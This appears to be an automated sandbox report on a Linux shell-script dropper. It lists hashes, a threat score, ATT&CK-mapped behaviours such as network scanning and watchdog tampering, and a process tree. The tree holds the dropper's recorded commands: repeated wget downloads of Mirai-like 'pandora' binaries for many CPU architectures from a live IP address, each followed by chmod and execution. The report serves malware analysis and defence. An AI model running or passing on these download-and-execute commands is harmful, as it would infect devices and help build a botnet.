e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f

General

Target

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Size

2KB
MD5

c7866a6bf93fe47bb819d8f5d379e353
SHA1

757fb6c3a1aa19e129b3ea3fef1da5bcfe70e55c
SHA256

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
SHA512

370ee08829af83c795191036f041e89949d1b03eb3b35452c17dc08555ca5633a1c0262ff2f4aaa730036973c510642dd3d0476b7bdad0d8839cd05087a10733

Score

9^/10

discovery

Malware Config

Signatures

Contacts a large (136179) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.

Impair Defenses
T1562
Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

description ioc

/bin/dash /bin/dash
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery
T1049

Processes:

description ioc

/proc/net/tcp /proc/net/tcp
Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

description ioc

/usr/bin/apt-get /usr/bin/apt-get
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery
T1016

Processes:

description ioc

/proc/net/tcp /proc/net/tcp

description	ioc
/bin/dash	/bin/dash

description	ioc
/proc/net/tcp	/proc/net/tcp

description	ioc
/usr/bin/apt-get	/usr/bin/apt-get

description	ioc
/proc/net/tcp	/proc/net/tcp

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

description	ioc
/proc/359/fd	/proc/359/fd
/proc/395/fd	/proc/395/fd
/proc/437/exe	/proc/437/exe
/proc/459/exe	/proc/459/exe
/proc/138/fd	/proc/138/fd
/proc/282/fd	/proc/282/fd
/proc/349/fd	/proc/349/fd
/proc/434/exe	/proc/434/exe
/proc/419/fd	/proc/419/fd
/proc/428/fd	/proc/428/fd
/proc/433/exe	/proc/433/exe
/proc/322/fd	/proc/322/fd
/proc/323/fd	/proc/323/fd
/proc/393/fd	/proc/393/fd
/proc/399/fd	/proc/399/fd
/proc/384/fd	/proc/384/fd
/proc/455/exe	/proc/455/exe
/proc/295/fd	/proc/295/fd
/proc/351/fd	/proc/351/fd
/proc/371/fd	/proc/371/fd
/proc/374/fd	/proc/374/fd
/proc/1/fd	/proc/1/fd
/proc/426/fd	/proc/426/fd
/proc/435/exe	/proc/435/exe
/proc/294/fd	/proc/294/fd
/proc/377/fd	/proc/377/fd
/proc/408/fd	/proc/408/fd
/proc/410/fd	/proc/410/fd
/proc/396/fd	/proc/396/fd
/proc/460/exe	/proc/460/exe
/proc/156/fd	/proc/156/fd
/proc/385/fd	/proc/385/fd
/proc/426/exe	/proc/426/exe
/proc/344/fd	/proc/344/fd
/proc/362/fd	/proc/362/fd
/proc/363/fd	/proc/363/fd
/proc/429/fd	/proc/429/fd
/proc/227/fd	/proc/227/fd
/proc/357/fd	/proc/357/fd
/proc/364/fd	/proc/364/fd
/proc/406/fd	/proc/406/fd
/proc/429/exe	/proc/429/exe
/proc/204/fd	/proc/204/fd
/proc/215/fd	/proc/215/fd
/proc/251/fd	/proc/251/fd
/proc/279/fd	/proc/279/fd
/proc/346/fd	/proc/346/fd
/proc/417/fd	/proc/417/fd
/proc/421/fd	/proc/421/fd
/proc/244/fd	/proc/244/fd
/proc/375/fd	/proc/375/fd
/proc/387/fd	/proc/387/fd
/proc/404/fd	/proc/404/fd
/proc/407/fd	/proc/407/fd
/proc/246/fd	/proc/246/fd
/proc/276/fd	/proc/276/fd
/proc/360/fd	/proc/360/fd
/proc/366/fd	/proc/366/fd
/proc/350/fd	/proc/350/fd
/proc/382/fd	/proc/382/fd
/proc/388/fd	/proc/388/fd
/proc/415/fd	/proc/415/fd
/proc/365/fd	/proc/365/fd
/proc/373/fd	/proc/373/fd

./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
1⤵
PID:322

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.x86
2⤵
PID:324

/bin/cat
cat pandora.x86
2⤵
PID:329

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:330

./awoo
./awoo
2⤵
PID:331

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.mips
2⤵
PID:333

/bin/cat
cat pandora.mips
2⤵
PID:335

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:336

./awoo
./awoo
2⤵
PID:337

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.mpsl
2⤵
PID:339

/bin/cat
cat pandora.mpsl
2⤵
PID:341

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:342

./awoo
./awoo
2⤵
PID:343

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm4
2⤵
PID:350

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:355

./awoo
./awoo
2⤵
PID:356

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm5
2⤵
PID:363

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:369

./awoo
./awoo
2⤵
PID:370

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm6
2⤵
PID:374

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:380

./awoo
./awoo
2⤵
PID:381

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm7
2⤵
PID:388

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:391

./awoo
./awoo
2⤵
PID:392

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.ppc
2⤵
PID:397

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:402

./awoo
./awoo
2⤵
PID:403

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.m68k
2⤵
PID:407

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:413

./awoo
./awoo
2⤵
PID:414

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.sh4
2⤵
PID:418

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.sh4 pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
2⤵
PID:424